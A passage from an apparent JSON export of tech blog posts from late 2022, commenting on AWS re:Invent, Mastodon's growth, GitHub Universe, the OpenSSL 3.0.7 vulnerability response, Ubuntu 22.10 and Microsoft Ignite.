2022","externalUrl":null,"permalink":"/posts/221201-chatgpt-changed-everything/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"OpenAI’s ChatGPT launches and immediately captivates the tech world with eerily capable conversational AI — but the real implications for developers run deeper than the hype.","title":"ChatGPT Just Changed Everything — Or Did It?","type":"posts"},{"content":"AWS re:Invent is underway in Las Vegas this week, and after attending virtually and following the keynotes closely, a clear theme is emerging: AWS is getting more opinionated. After years of offering low-level building blocks and letting customers figure out the architecture, Amazon is increasingly shipping higher-level, integrated services that encode best practices directly. This evolution continued through later AWS re:Invent announcements and 2025 innovation.\nThis is a significant shift for a company that has historically prided itself on offering primitives. And as someone who has been building on AWS since the S3-and-EC2 days, I have mixed feelings about it.\nThe Headline Announcements # The announcements are coming fast, as usual, but several stand out from an infrastructure perspective.\nAmazon EventBridge Pipes simplifies point-to-point integrations between event producers and consumers. Instead of writing Lambda glue code to move events between services, Pipes lets you declaratively connect sources to targets with optional filtering and transformation. It\u0026rsquo;s the kind of thing many teams have built custom scaffolding for, and having it as a managed service removes meaningful operational burden.\nAWS Application Composer is a visual tool for building serverless applications by dragging and dropping AWS resources on a canvas. It generates SAM/CloudFormation templates underneath. My first reaction was skepticism — visual infrastructure tools have a poor track record — but the tight integration with Infrastructure as Code underneath makes this more interesting than past attempts.\nAmazon CodeCatalyst is AWS\u0026rsquo;s entry into the unified DevOps platform space, combining project management, CI/CD, and development environments. It\u0026rsquo;s clearly a response to GitHub\u0026rsquo;s expansion beyond source control and GitLab\u0026rsquo;s integrated platform approach. Whether the market needs another DevOps platform is debatable, but AWS clearly thinks owning the developer workflow matters.\nThe Data Layer Moves # Perhaps more consequential than the developer tooling are the data-layer announcements. Amazon Aurora zero-ETL integration with Amazon Redshift is genuinely interesting — it enables near-real-time analytics on transactional data without building and maintaining ETL pipelines. If you\u0026rsquo;ve ever maintained a nightly ETL job that copies production data to a data warehouse, you understand why this matters.\nAmazon OpenSearch Serverless removes the need to provision and manage OpenSearch clusters. You pay for compute and storage consumption rather than instance hours. For teams running small-to-medium search workloads, this eliminates the classic problem of over-provisioning OpenSearch domains to handle peak load while paying for idle capacity during quiet periods.\nThe pattern across these announcements is consistent: take something that requires expertise and operational effort, and collapse it into a managed service with sane defaults. This aligns with broader platform engineering maturity trends.\nThe Graviton3E and Custom Silicon Story # AWS continues to push its custom silicon strategy. The Graviton3E instances (C7gn) optimized for networking-intensive workloads and the continued expansion of Graviton3 availability across instance families reinforce that ARM-based compute is no longer experimental on AWS — it\u0026rsquo;s the recommended default for many workloads.\nI\u0026rsquo;ve been running production workloads on Graviton2 instances for over a year now, and the price-performance advantage is real. Graviton3 extends that lead. The ecosystem compatibility story has also improved dramatically — most Docker images now publish multi-arch manifests, and the major language runtimes all have solid ARM64 support.\nThe custom silicon narrative extends beyond compute with AWS Inferentia2 chips for ML inference workloads, promising significant cost savings over GPU-based inference. NVIDIA\u0026rsquo;s competitive response shows how intense this space has become. As ML model serving becomes a bigger part of cloud spend, purpose-built inference hardware could meaningfully change the economics.\nWhat\u0026rsquo;s Missing: Cost Transparency # For all the impressive announcements, one area where AWS continues to underdeliver is cost predictability. New serverless and consumption-based services are great for eliminating idle costs, but they also make it harder to predict monthly bills. OpenSearch Serverless, for example, charges in \u0026ldquo;OCUs\u0026rdquo; (OpenSearch Compute Units) — a new unit that teams will need to build intuition around.\nI keep waiting for a re:Invent where cost management is a headline theme rather than an afterthought. AWS Cost Explorer and the recent Cost Anomaly Detection improvements help, but the fundamental challenge of understanding what you\u0026rsquo;ll pay before you get the bill remains unsolved. Third-party tools like Vantage, Infracost, and the open-source OpenCost project are filling this gap, which tells you something about the state of native tooling.\nMy Take # Re:Invent always generates a wave of \u0026ldquo;look at everything new\u0026rdquo; excitement, and this year is no different. But the underlying trend — AWS moving up the stack toward more opinionated, integrated solutions — is the real story. The cloud consolidation story continues to shape infrastructure choices. It\u0026rsquo;s a tacit acknowledgment that many customers don\u0026rsquo;t want building blocks; they want solutions.\nThis is good for teams that are happy within the AWS ecosystem. Zero-ETL from Aurora to Redshift genuinely removes painful infrastructure work. EventBridge Pipes eliminates boilerplate. Application Composer could help teams visualize their serverless architectures.\nBut it also deepens lock-in. Each opinionated service that replaces a general-purpose pattern (say, a Lambda function moving data between queues) is harder to replicate on another cloud. That\u0026rsquo;s the trade-off, and it\u0026rsquo;s one every architecture team needs to evaluate consciously rather than sleepwalking into.\nThe cloud is maturing, and mature platforms get opinionated. That\u0026rsquo;s not inherently good or bad — it\u0026rsquo;s a phase of the technology lifecycle. The key is being deliberate about which opinions you adopt.\n","date":"24 November 2022","externalUrl":null,"permalink":"/posts/221124-aws-reinvent-2022-cloud-opinionated/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"AWS re:Invent 2022 kicks off with a clear message: the cloud giant is moving beyond primitives and toward opinionated, integrated solutions.","title":"AWS re:Invent 2022 — The Cloud Gets Opinionated","type":"posts"},{"content":"If you\u0026rsquo;ve been anywhere near tech circles this past week, you\u0026rsquo;ve heard the word \u0026ldquo;Mastodon\u0026rdquo; more times than in the previous six years combined. The mass exodus from Twitter — fueled by layoffs, policy chaos, and general uncertainty under new ownership — has sent millions of users scrambling for alternatives. And Mastodon, the open-source, decentralized microblogging platform built on the ActivityPub protocol, is the primary beneficiary.\nMastodon has reportedly gained over 2 million new users in just the past two weeks. For a project that was largely dismissed as a niche curiosity since its launch in 2016, this is a defining moment. But as someone who has watched many \u0026ldquo;this will replace X\u0026rdquo; movements come and go, I\u0026rsquo;m more interested in what\u0026rsquo;s happening under the hood than in the migration numbers themselves.\nActivityPub: The Protocol That Could # What makes Mastodon genuinely interesting from an engineering perspective isn\u0026rsquo;t the Rails application itself — it\u0026rsquo;s ActivityPub, the W3C standard that powers federation between instances. Unlike centralized platforms where a single company controls the infrastructure, Mastodon operates as a network of independently hosted servers (instances) that communicate through a shared protocol.\nThis is conceptually similar to email: you can run your own mail server, use Gmail, or choose any provider, and they all interoperate. ActivityPub extends this model to social interactions — follows, posts, boosts, and replies all flow between instances via standardized JSON-LD payloads over HTTPS.\nThe elegance is real, but so are the challenges. Federation means that a popular post doesn\u0026rsquo;t just live on one server — it gets replicated across potentially thousands of instances. Each boost, each reply, generates federation traffic. The protocol wasn\u0026rsquo;t designed with the assumption that millions of users would arrive in a two-week window.\nThe Scalability Reality Check # Instance administrators are learning hard lessons right now. The flagship mastodon.social instance, run by Mastodon\u0026rsquo;s creator Eugen Rochko, has been struggling with load. Sidekiq queues — Mastodon uses Sidekiq for background job processing — have been backing up significantly. Federation delivery, media processing, and notification dispatch all compete for worker threads.\nI\u0026rsquo;ve been poking around the Mastodon GitHub repository and the issues being filed are exactly what you\u0026rsquo;d expect from a sudden 10x traffic spike: database connection pool exhaustion, Redis memory pressure, and Elasticsearch indexing falling behind. The architecture is solid Ruby on Rails with PostgreSQL, Redis, and optional Elasticsearch — a well-understood stack, but one that requires careful tuning at scale.\nWhat\u0026rsquo;s particularly challenging is that smaller instances, often run by volunteers on modest VPS plans, are hit hardest. A small instance with 500 users that suddenly gains 5,000 new accounts faces not just local load but exponentially more federation traffic as those new users follow accounts across the network.\nThe Self-Hosting Question # This situation highlights something I\u0026rsquo;ve been thinking about for years: the gap between \u0026ldquo;you can self-host this\u0026rdquo; and \u0026ldquo;you should self-host this.\u0026rdquo; Running a Mastodon instance requires PostgreSQL administration, Redis management, media storage (S3 or local), SMTP configuration, and ongoing security updates. It\u0026rsquo;s not trivial.\nDocker Compose makes initial deployment straightforward, but operational excellence requires monitoring, backup strategies, and capacity planning. I\u0026rsquo;ve seen several new instance admins discovering that object storage costs for federated media can surprise you quickly — every image and video that your users\u0026rsquo; timelines pull in gets cached locally by default.\nThe positive side is that this is forcing the community to produce better operational documentation. Guides for running Mastodon behind Cloudflare, tuning PgBouncer connection pooling, and configuring S3-compatible storage are proliferating. The Mastodon documentation itself has seen a flurry of contributions.\nWhat This Means for Decentralized Software # Beyond Mastodon specifically, this moment matters for the broader decentralized web movement. ActivityPub isn\u0026rsquo;t just for microblogging — projects like PeerTube (video), Pixelfed (photos), and Lemmy (link aggregation) all implement the protocol. A user on Mastodon can theoretically follow and interact with a PeerTube channel. This interoperability is the real promise.\nThe stress test also reveals where the protocol needs work. Discovery is poor compared to centralized platforms — finding people across instances requires knowing their full handle or stumbling upon them through boosts. Content moderation is instance-level, which is both a feature and a challenge. There\u0026rsquo;s no global search across the fediverse by design, which protects privacy but frustrates newcomers.\nMy Take # I\u0026rsquo;ve run a small ActivityPub-compatible instance for testing purposes, and I can tell you: the technology works, but the operational burden is real. What excites me about this moment isn\u0026rsquo;t necessarily that Mastodon will \u0026ldquo;win\u0026rdquo; against Twitter — I\u0026rsquo;m skeptical of that framing. What excites me is that millions of people are experiencing, for the first time, what it means to use software that no single entity controls.\nWhether the retention numbers hold up remains to be seen. But the contributions flowing into the Mastodon codebase, the improvements to federation performance, and the increased awareness of protocols like ActivityPub — these have lasting value regardless of what happens with Twitter. Open protocols tend to compound in value over time, even when individual implementations rise and fall.\nThe fediverse just got its biggest real-world stress test. And honestly? It\u0026rsquo;s holding up better than I expected.\n","date":"17 November 2022","externalUrl":null,"permalink":"/posts/221117-mastodon-fediverse-stress-test/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"As millions flee Twitter for Mastodon, the decentralized social protocol ActivityPub faces its biggest real-world scalability challenge yet.","title":"Mastodon's Moment — The Fediverse Gets Its Stress Test","type":"posts"},{"content":"GitHub Universe 2022 wrapped up yesterday, and the message was clear: AI-assisted development isn\u0026rsquo;t a future vision — it\u0026rsquo;s the product strategy. The conference delivered a slate of announcements that range from genuinely useful to thought-provoking, all centered around the idea that developer productivity is the key metric GitHub is optimizing for.\nCopilot for Business: Enterprise AI Arrives # The biggest announcement is GitHub Copilot for Business, which makes the AI pair programmer available with enterprise-grade features: organization-wide policy management, centralized billing, and — critically — a proxy server option that routes through your organization\u0026rsquo;s network.\nThe individual version of Copilot has been available since June, and I\u0026rsquo;ve been using it daily. My experience has been mixed but trending positive. For boilerplate code, test scaffolding, and common patterns, it\u0026rsquo;s remarkably good. It saves me real time on tasks I\u0026rsquo;d otherwise spend five minutes writing by hand. For complex logic or domain-specific code, it\u0026rsquo;s less reliable but still useful as a starting point.\nThe Business tier adds features that enterprises actually need. The organization-wide policy controls let administrators enable or disable Copilot across teams, block suggestions that match public code (addressing the copyright concerns), and manage licenses centrally. The VPN-compatible proxy option addresses the data sovereignty concerns that kept many regulated industries from adopting the individual version.\nI expect adoption to accelerate now. The objections I\u0026rsquo;ve heard from engineering managers have consistently been about policy control and licensing, not about the technology itself. Later evolution of Copilot would expand its capabilities significantly. This release removes those barriers.\nHey, GitHub! — Voice Coding # The more experimental announcement was \u0026ldquo;Hey, GitHub!\u0026rdquo;, a voice-controlled coding interface. Currently in technical preview, it lets developers write and edit code using natural language voice commands.\nI\u0026rsquo;m less convinced about this one. Voice coding has been attempted before — tools like Talon and Serenade have served the accessibility community well — but mainstream adoption has been limited. AI-assisted coding would eventually mature beyond voice input. The demo showed writing Python functions by describing them verbally, which is impressive, but the real challenge is editing existing code, navigating large codebases, and handling the back-and-forth of iterative development.\nWhere I see genuine value is in accessibility. Developers with repetitive strain injuries or other conditions that limit keyboard use deserve first-class tools, and GitHub investing in this space is positive regardless of whether it becomes a mainstream workflow.\nCodespaces for Free Tier # GitHub is making Codespaces available to all users, including free-tier accounts, with 60 hours per month of 2-core usage and 15 GB of storage included. This is a significant democratization move.\nI\u0026rsquo;ve been using Codespaces for several open-source projects, and the onboarding improvement is dramatic. A new contributor can go from \u0026ldquo;I want to help\u0026rdquo; to \u0026ldquo;I have a running development environment\u0026rdquo; in under two minutes. No local setup, no dependency conflicts, no \u0026ldquo;works on my machine\u0026rdquo; issues.\nFor open-source maintainers, this is arguably more impactful than Copilot. The biggest barrier to open-source contribution isn\u0026rsquo;t writing code — it\u0026rsquo;s setting up the development environment. DevContainers and Codespaces effectively eliminate that barrier. I\u0026rsquo;ve already added devcontainer.json files to several of my repositories, and the increase in drive-by contributions has been noticeable.\nGitHub Actions Improvements # The Actions announcements were less flashy but practically important. Required workflows let organization admins enforce that specific workflows run on every repository — think security scanning, compliance checks, or standardized testing. Reusable workflows improvements now support calling workflows from private repositories, which makes it practical to maintain internal workflow libraries.\nRequired workflows, in particular, solve a governance problem I\u0026rsquo;ve fought with for years. When you have hundreds of repositories in an organization, ensuring that every one runs your security scanning pipeline is a constant battle. Some teams forget, some teams remove it, some teams never added it. Being able to enforce it at the organization level is exactly right.\nThe Broader AI Strategy # Stepping back from individual announcements, what\u0026rsquo;s striking about Universe this year is how comprehensively GitHub is integrating AI. Copilot writes code. Copilot Labs explains and translates code. The upcoming code review features use AI to suggest improvements. The security scanning uses AI to detect vulnerabilities.\nGitHub is building toward a future where AI is involved in every stage of the development lifecycle — writing, reviewing, testing, deploying, and monitoring. Testing acceleration with AI shows how deep this integration runs. Whether that\u0026rsquo;s exciting or concerning depends on your perspective.\nI lean toward cautiously excited. The tools I\u0026rsquo;ve used — Copilot primarily — have made me more productive without making me less thoughtful about code quality. The developer experience evolution continues to push these boundaries forward. The key is that these are assistive tools, not autonomous ones. I still make every architectural decision, I still review every suggestion, and I still write the critical logic myself. AI handles the tedious parts so I can focus on the interesting parts.\nMy Take # GitHub Universe 2022 confirms that AI-assisted development is no longer experimental — it\u0026rsquo;s the product. Copilot for Business will drive enterprise adoption, free Codespaces will boost open-source contribution, and the Actions improvements will make platform engineering teams\u0026rsquo; lives easier.\nThe question I keep coming back to is: what does this mean for junior developers? If AI handles the boilerplate, how do newcomers build the intuition that comes from writing it themselves? I don\u0026rsquo;t have a good answer yet, but it\u0026rsquo;s a question our industry needs to grapple with as these tools become ubiquitous.\nFor now, if you haven\u0026rsquo;t tried Copilot, give it a shot. If you maintain open-source projects, add a devcontainer.json. And if you\u0026rsquo;re an engineering manager, Copilot for Business just removed your last excuse for not evaluating it.\n","date":"10 November 2022","externalUrl":null,"permalink":"/posts/221110-github-universe-2022-copilot-business/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"GitHub Universe 2022 puts AI front and center with Copilot for Business, while Codespaces and Actions get meaningful upgrades.","title":"GitHub Universe 2022 — Copilot for Business and the AI-Assisted Future","type":"posts"},{"content":"On Tuesday, November 1st, the OpenSSL project released version 3.0.7, patching two high-severity vulnerabilities: CVE-2022-3602 and CVE-2022-3786. Both are buffer overflow issues in the X.509 certificate verification code, specifically in the handling of punycode in email address name constraints. What made this event notable wasn\u0026rsquo;t just the vulnerabilities themselves — it was the week of anticipation that preceded them.\nThe Pre-Announcement That Shook the Industry # On October 25th, the OpenSSL project announced that a critical security fix would be released on November 1st. They didn\u0026rsquo;t say what the vulnerability was, only that it affected OpenSSL 3.0 and above and was rated \u0026ldquo;CRITICAL\u0026rdquo; — the highest severity.\nThe internet collectively held its breath. The last time OpenSSL had a critical vulnerability was Heartbleed in 2014, which affected an estimated 17% of the internet\u0026rsquo;s secure web servers. Organizations around the world started preparing: inventorying which systems ran OpenSSL 3.0, staging patch deployments, and drafting incident response plans. This pattern mirrors the urgency seen when supply chain vulnerabilities emerge at critical infrastructure layers.\nI spent part of last week auditing our own infrastructure. The good news was that most production systems still run OpenSSL 1.1.1, which isn\u0026rsquo;t affected. The concerning discovery was how many container base images had quietly moved to OpenSSL 3.0 — several of our build containers based on Ubuntu 22.04 and Alpine 3.17 were in scope.\nWhat The Vulnerabilities Actually Are # When the details emerged on November 1st, the community\u0026rsquo;s reaction was a mixture of relief and slight anticlimax. The original CRITICAL rating was downgraded to HIGH before release, after further analysis showed the vulnerabilities were harder to exploit than initially assessed.\nCVE-2022-3602 is a 4-byte buffer overflow that can be triggered during X.509 certificate verification when a certificate contains a specially crafted punycode-encoded email address. CVE-2022-3786 is a related overflow in the same code path, but can only overwrite the buffer with the period character (.), limiting its exploitability.\nFor exploitation, an attacker would need either a malicious CA to sign a crafted certificate, or a legitimate CA to issue a certificate with the malicious payload. The victim\u0026rsquo;s application would need to be using OpenSSL 3.0+ and have certificate verification enabled. Many platforms also have stack overflow protections that would turn the exploit into a denial-of-service rather than code execution.\nThis significantly narrows the attack surface compared to Heartbleed, which could be exploited remotely against any server running affected OpenSSL versions. But \u0026ldquo;hard to exploit\u0026rdquo; isn\u0026rsquo;t the same as \u0026ldquo;impossible to exploit,\u0026rdquo; and patching should still be treated as urgent.\nThe SBOM Question # This event has reignited discussions about Software Bills of Materials (SBOMs) and dependency visibility. When the pre-announcement dropped, the first question every security team asked was: \u0026ldquo;Where are we running OpenSSL 3.0?\u0026rdquo; The challenge of tracking library dependencies across an organization is one of the hardest unsolved problems in modern software development.\nFor many organizations, answering this question was surprisingly difficult. OpenSSL is embedded in countless applications, libraries, and container images. Your Python application might use it through the ssl module. Your Node.js runtime links against it. Your Java application might use it through native TLS bindings. It\u0026rsquo;s everywhere, and tracking it requires systematic dependency management.\nThis is exactly the use case SBOMs are designed for. If you had generated SBOMs for your container images and deployed artifacts, you could have queried them to identify affected systems within minutes. Instead, most teams spent hours or days manually auditing their infrastructure.\nThe NIST SBOM guidelines and the Biden administration\u0026rsquo;s Executive Order 14028 on cybersecurity have been pushing for SBOM adoption, but adoption remains low. Events like this should be the wake-up call.\nContainer Image Implications # The container ecosystem adds a layer of complexity to OpenSSL patching. If you\u0026rsquo;re running applications in Docker containers, your OpenSSL version depends on which base image you used and when you built it. A container built from ubuntu:22.04 three months ago has a different OpenSSL version than one built today.\nThis is why image scanning tools like Trivy, Grype, and Snyk Container exist. They can scan your running containers and registry images for known vulnerabilities, including this one. If you\u0026rsquo;re not already running these in your CI/CD pipeline, now is the time to start.\nThe patch workflow for containers is: update your base images, rebuild your application containers, scan them to confirm the fix, and redeploy. For organizations with hundreds of microservices, this can take days. Automating as much of this pipeline as possible — automated base image updates via Dependabot or Renovate, automated rebuilds, automated scanning — turns a week-long scramble into a routine operation.\nMy Take # The handling of this vulnerability was, on balance, good. The pre-announcement gave organizations time to prepare. The downgrade from CRITICAL to HIGH was responsible — it reflected updated analysis rather than marketing. And the patch was released on schedule.\nBut the week of uncertainty also exposed how unprepared many organizations are for rapid patching. If it takes your team a week to answer \u0026ldquo;where do we run this library?\u0026rdquo; you have a visibility problem that needs addressing before the next critical CVE drops.\nMy recommendations coming out of this event: implement SBOM generation in your build pipeline, run container image scanning in CI/CD, and maintain an inventory of your cryptographic library dependencies. The infrastructure for secure software supply chains needs to be as critical as the application code itself. The next OpenSSL vulnerability might not be downgraded.\n","date":"3 November 2022","externalUrl":null,"permalink":"/posts/221103-openssl-critical-vulnerability-response/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"The OpenSSL 3.0.7 patch for CVE-2022-3602 and CVE-2022-3786 arrived this week — here’s what happened and what it teaches us about vulnerability response.","title":"OpenSSL's Critical Vulnerability — Lessons From a Week of Preparation","type":"posts"},{"content":"With Elon Musk\u0026rsquo;s acquisition of Twitter closing today, there\u0026rsquo;s been a massive wave of users migrating to Mastodon, the open-source, decentralized social network. Mastodon has reportedly gained over 200,000 new users in the past week alone, and the numbers keep climbing. As both a long-time open-source advocate and someone who runs infrastructure for a living, this moment is fascinating — and raises some serious technical questions.\nThe ActivityPub Architecture Under Pressure # Mastodon is built on ActivityPub, a W3C standard for decentralized social networking. Instead of a single company running all the servers, anyone can run a Mastodon instance (server) that federates — shares content — with other instances across the network.\nThis is elegant in theory, but the current surge is stress-testing the architecture in ways it hasn\u0026rsquo;t experienced before. Each Mastodon instance is essentially an independent Ruby on Rails application backed by PostgreSQL, with Redis for caching and Sidekiq for background job processing. When a post federates, it needs to be delivered to every instance that has followers of that user. For popular accounts, that means thousands of HTTP POST requests per message.\nI\u0026rsquo;ve been watching the infrastructure metrics from several large instances, and the bottleneck is consistently in the Sidekiq job queues. Federation delivery jobs pile up faster than they can be processed, creating delays of minutes to hours for posts to appear on remote instances. The architecture wasn\u0026rsquo;t designed for this kind of throughput, and it shows.\nThe Instance Admin Challenge # What makes this migration unique is that Mastodon\u0026rsquo;s infrastructure is run by volunteers. The largest instances — mastodon.social, mastodon.online, mstdn.social — are operated by individuals or small teams, often funded by Patreon or donations. When you go from 10,000 active users to 100,000 in a week, your infrastructure costs don\u0026rsquo;t increase linearly. They spike dramatically.\nInstance administrators are scrambling to scale their PostgreSQL databases, add Sidekiq workers, and increase their Redis memory allocations. Some have set up GoFundMe campaigns to cover unexpected hosting bills. Others have temporarily closed registrations to prevent their instances from becoming unusable.\nThis is the uncomfortable truth about decentralization: it distributes the technical and financial burden to people who may not have the resources or expertise to handle it. Running a social media server for a few hundred friends is very different from running one for tens of thousands of strangers.\nWhat Mastodon Gets Right # Despite the scaling challenges, there are aspects of Mastodon\u0026rsquo;s architecture that are genuinely well-designed. The ActivityPub protocol means no single point of failure. If mastodon.social goes down, the rest of the network continues operating. Your identity isn\u0026rsquo;t tied to a company\u0026rsquo;s business model.\nThe content moderation model is also interesting. Each instance sets its own rules, and instances can block or silence other instances. This creates a layered moderation approach where communities can set their own standards while still participating in the broader network. After years of watching centralized platforms struggle with content moderation at scale, this federated approach has clear advantages.\nFrom a developer perspective, the Mastodon API is clean and well-documented. It\u0026rsquo;s broadly compatible with the Twitter API v1 patterns, which has made it relatively easy for developers to build clients and tools. The ecosystem of third-party apps — Tusky, Ice Cubes, Ivory (in development) — is growing rapidly.\nThe Technical Improvements Needed # For Mastodon to sustain this growth, several technical challenges need addressing. The federation delivery system needs to be more efficient — perhaps batching deliveries by instance rather than sending individual requests. The search functionality is intentionally limited (you can only search hashtags by default, not full text), which is a deliberate design choice but frustrates new users coming from Twitter.\nThe onboarding experience is also a significant barrier. Asking new users to choose an instance before they understand what instances are creates unnecessary friction. The joinmastodon.org site tries to help, but the concept of federation is inherently more complex than \u0026ldquo;sign up for Twitter.\u0026rdquo;\nThere\u0026rsquo;s also the question of long-term sustainability. The current funding model — donations and Patreon — works for small instances but doesn\u0026rsquo;t scale to the infrastructure demands of a platform serving millions. Someone needs to figure out how to fund decentralized infrastructure sustainably, and I don\u0026rsquo;t think anyone has cracked that yet.\nMy Take # I set up my own Mastodon instance a couple of years ago, mostly out of curiosity. It\u0026rsquo;s been a quiet corner of the internet where I occasionally post about infrastructure topics. This week, it suddenly feels a lot less quiet.\nI\u0026rsquo;m cautiously optimistic about this moment. The underlying technology — ActivityPub, federation, open-source social networking — is sound. The principles are right: users should own their social graph, moderation should be community-driven, and no single company should control public discourse.\nBut I\u0026rsquo;ve been in tech long enough to know that surviving a hype cycle is harder than starting one. The real test for Mastodon isn\u0026rsquo;t whether it can handle this week\u0026rsquo;s traffic spike — it\u0026rsquo;s whether the community can build the infrastructure, tooling, and funding models to sustain growth over years.\nIf you\u0026rsquo;re a developer thinking about joining Mastodon, I\u0026rsquo;d encourage it. Pick a smaller, well-moderated instance rather than piling onto mastodon.social. And if you have infrastructure experience, consider helping an instance admin — they could use it right now.\nThe fediverse is having its moment. Let\u0026rsquo;s see if it can make it last.\n","date":"27 October 2022","externalUrl":null,"permalink":"/posts/221027-mastodon-decentralized-social-scaling/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"As users flood to Mastodon following the Twitter acquisition, the open-source platform faces its biggest infrastructure test yet.","title":"Mastodon's Moment — Can Decentralized Social Scale?","type":"posts"},{"content":"Canonical released Ubuntu 22.10 \u0026ldquo;Kinetic Kudu\u0026rdquo; today, and while interim releases don\u0026rsquo;t get the same fanfare as LTS versions, they serve an important purpose in the Ubuntu ecosystem. They\u0026rsquo;re the proving ground for what lands in the next long-term support release, and for developers, they offer early access to updated toolchains that can matter for day-to-day work.\nThe Toolchain Updates That Actually Matter # The headline developer-facing changes are in the default toolchain. Ubuntu 22.10 ships with GCC 12.2, Python 3.10.7, and OpenSSL 3.0 as the default. For those of us building and deploying applications, these aren\u0026rsquo;t just version bumps — they have real implications.\nGCC 12 brings improved diagnostics and better C++20/23 support. If you\u0026rsquo;re working on C or C++ projects, the improved error messages alone are worth the upgrade. I\u0026rsquo;ve been using GCC 12 in containers for a few months now, and the quality-of-life improvements in compilation errors have saved me more debugging time than I\u0026rsquo;d like to admit.\nPython 3.10 as the system default is noteworthy because it means the match statement (structural pattern matching) and improved error messages are now available out of the box. If you\u0026rsquo;ve been developing against 3.10+ features but your CI servers were still on 3.9, this simplifies things.\nThe OpenSSL 3.0 default is the one that will cause the most headaches. OpenSSL 3.0 deprecated a number of legacy algorithms and changed the provider architecture significantly. Applications that relied on older ciphers or the legacy API will need updates. I\u0026rsquo;ve already seen this cause issues in several Node.js projects where native modules were compiled against OpenSSL 1.1.\nGNOME 43 and the Desktop Story # For desktop users, Ubuntu 22.10 brings GNOME 43 with its new quick settings panel and continued GTK4/libadwaita migration. The quick settings redesign is genuinely useful — it consolidates Wi-Fi, Bluetooth, dark mode, and power settings into a single, cleanly organized panel.\nThe more interesting desktop change is the continued adoption of PipeWire as the default audio server, replacing PulseAudio. PipeWire has been remarkably stable in my experience, handling both audio and screen sharing (particularly in Wayland sessions) better than the PulseAudio/PulseVideo combination it replaces.\nIf you\u0026rsquo;re a developer who does screen sharing during pair programming sessions or demos, PipeWire on Wayland is a significant improvement. The days of \u0026ldquo;let me switch to X11 so screen sharing works\u0026rdquo; are finally numbered.\nSnap Packages: The Ongoing Debate # Ubuntu 22.10 continues Canonical\u0026rsquo;s push toward Snap packages, with Firefox remaining a Snap and more system applications moving to the format. This remains one of the most divisive decisions in the Ubuntu community.\nI understand the arguments on both sides. Snaps solve real problems around dependency isolation and automatic updates. But the startup time penalty is noticeable, especially on older hardware, and the mandatory Snap Store backend frustrates those who prefer fully open infrastructure.\nFor server-side development — which is where most of us interact with Ubuntu professionally — Snaps are largely irrelevant. Server deployments use debs, containers, or direct binary deployments. The Snap debate is primarily a desktop concern, but it does affect developer workstations, and slow application startup times on your dev machine are a real productivity issue.\nWhat This Means for the Next LTS # The real value of Ubuntu 22.10 is as a preview of Ubuntu 24.04 LTS, which is about 18 months away. The toolchain choices being tested now — GCC 12, Python 3.10+, OpenSSL 3.0, PipeWire — will likely form the foundation of that release.\nIf you\u0026rsquo;re running Ubuntu 22.04 LTS in production (as many of us are), now is the time to start testing your applications against these newer toolchain versions. OpenSSL 3.0 migration in particular can be disruptive, and you don\u0026rsquo;t want to discover compatibility issues when you\u0026rsquo;re under pressure to upgrade.\nI\u0026rsquo;ve started running our CI pipelines against both 22.04 and 22.10 base images to catch any toolchain compatibility issues early. It\u0026rsquo;s a small investment that pays off significantly when the next LTS drops.\nMy Take # Interim Ubuntu releases don\u0026rsquo;t get a lot of love, and honestly, I wouldn\u0026rsquo;t recommend most people run them in production. The nine-month support window is too short for any serious deployment. But as a developer, installing 22.10 on a secondary machine or using it as a container base for testing is a smart move.\nThe most impactful change in this release is the OpenSSL 3.0 default. If you haven\u0026rsquo;t started testing your applications against OpenSSL 3.0, let this be your reminder. The migration from 1.1 to 3.0 is one of those changes that seems minor until it breaks your TLS configuration in production.\nUbuntu continues to be the dominant Linux distribution for cloud workloads and developer machines, and releases like 22.10 are part of why. They provide a structured, predictable path for toolchain evolution that the broader ecosystem can plan around. Not exciting, perhaps, but reliable — and in infrastructure, reliable wins.\n","date":"20 October 2022","externalUrl":null,"permalink":"/posts/221020-ubuntu-2210-kinetic-kudu/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Ubuntu 22.10 ships with updated toolchains and GNOME 43, but the real story is what it previews for the next LTS cycle.","title":"Ubuntu 22.10 Kinetic Kudu — What Matters for Server-Side Developers","type":"posts"},{"content":"Microsoft Ignite kicked off this week, and while the keynote had its usual polish, the real substance was buried in the breakout sessions and product announcements. After attending these events for years — sometimes in person, sometimes virtually — I\u0026rsquo;ve learned to look past the marketing slides and focus on what\u0026rsquo;s actually shipping. This year, Azure\u0026rsquo;s infrastructure story is genuinely compelling.\nAzure Cosmos DB for PostgreSQL: A Smart Pivot # The announcement that caught my eye first was Azure Cosmos DB for PostgreSQL. Microsoft has essentially rebranded and deeply integrated Citus — the distributed PostgreSQL extension they acquired back in 2019 — into the Cosmos DB family.\nThis is significant because it acknowledges what many of us have been saying for years: PostgreSQL is the de facto standard for relational workloads, and enterprises want to scale it horizontally without abandoning the ecosystem they know. By bringing it under the Cosmos DB umbrella, Microsoft is betting that developers would rather scale PostgreSQL than learn a new query language or data model.\nI\u0026rsquo;ve worked on projects where we had to choose between the familiarity of PostgreSQL and the scalability of a distributed database. Having a managed, horizontally-scalable Postgres option in Azure removes that tradeoff for a lot of use cases. The key question will be how seamless the Citus distribution layer really is when you throw complex queries at it — but the direction is right.\nAzure Kubernetes Fleet Manager # Another announcement worth paying attention to is Azure Kubernetes Fleet Manager, which moves into public preview. If you\u0026rsquo;re managing multiple AKS clusters — and in any serious enterprise deployment, you are — this tool addresses a real pain point.\nFleet Manager provides a unified control plane for orchestrating updates, managing configurations, and distributing workloads across multiple clusters. Think of it as the \u0026ldquo;cluster of clusters\u0026rdquo; management layer that Kubernetes itself doesn\u0026rsquo;t provide natively. GitOps tools like ArgoCD have been the workaround for many teams.\nI\u0026rsquo;ve seen organizations try to solve this with custom tooling wrapped around ArgoCD or Flux, and it\u0026rsquo;s always messy. Every team ends up building their own multi-cluster abstraction, and they\u0026rsquo;re all slightly different. Having a first-party solution from Azure that handles progressive rollouts across clusters is the kind of boring-but-essential infrastructure work that actually matters.\nThe multi-cluster problem is one of the big unsolved challenges in the Kubernetes ecosystem. Google has Anthos, AWS has EKS Anywhere, and now Azure has Fleet Manager. None of these are perfect, but the fact that all three major clouds are investing heavily tells you the demand is real.\nMicrosoft Dev Box Goes GA # Microsoft Dev Box reaching general availability is interesting from a developer 